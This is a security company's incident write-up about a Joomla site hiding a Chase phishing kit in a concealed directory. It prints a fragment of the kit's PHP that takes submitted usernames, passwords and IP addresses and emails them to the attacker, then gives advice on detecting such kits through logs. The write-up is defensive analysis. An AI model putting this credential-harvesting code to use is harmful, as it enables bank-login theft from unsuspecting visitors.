Last week we were called to fix a Joomla site that was infected by malware and disabled by their hosting company. The user forwarded the email he received:
Your account was reported to us by Google for malicious content and has been deactivated.
We ran a search on your account for the content that was reported and found files that contained malicious code. We created a text file that lists the files that we found the malicious code in and put it in your home directory; The file is called malware.txt. This file is not actually infected, it is an actual list of the problem files on your account based on Google’s report. Please keep in mind that we cannot guarantee that this is a complete list of every possible issue that your account has, it is a list of what we found based on Google’s report.
Nothing really unusual as we see this many times a day.
However, after some analysis of the site, we found a directory that didn’t look quite right. It was called “chase” and was inside another hidden directory called “.webservices”…
When we looked at the content, it had 3 files:
$ ls .webservices/chase
The index.php was similar to the login page for Chase, and asked for the user/pass of the person accessing it:
The difference is that the form was sending the user/pass to a login.php script (instead of Chase). Inside the login.php file it was emailing the user/pass to firstname.lastname@example.org and email@example.com:
$ip = getenv(“REMOTE_ADDR”);
$adddate=date(“D M d, Y g:i a”);
$user1 = $_POST['UserID'];
$pass1 = $_POST['Password'];
$subj = “CHASE $ip”;
$msg = “Chase Info\n\nUsername: $user1\nPassword: $pass1\n———————————–\n Created By Lom\n———————————–“;
$from = “From:
mail(“$chaseme”, $subj, $msg, $from);
Very nasty. We looked at all the logs and saw quite a few clicks onto this fraudulent page. Unfortunately, some people were compromised by this malicious phishing attemp.
Not sure it can ever be completely stopped, but why not reduce the risk. We definitely recommend that you check your logs more often. One area to analyze is all of the references to images being loaded. In this case study we’re able to conclude that the images and the css files used in the phishing attempt were being loaded directory from the Chase site. If the victim was analyzing their logs, they could have detected it a lot sooner.
All you webmasters and site owners out there: Keep your sites updated, use good passwords and monitor your sites!
As always, if you need help to recover from web attacks, or need someone to monitor your web site for these issues, visit http://sucuri.net, or just send us an email at firstname.lastname@example.org.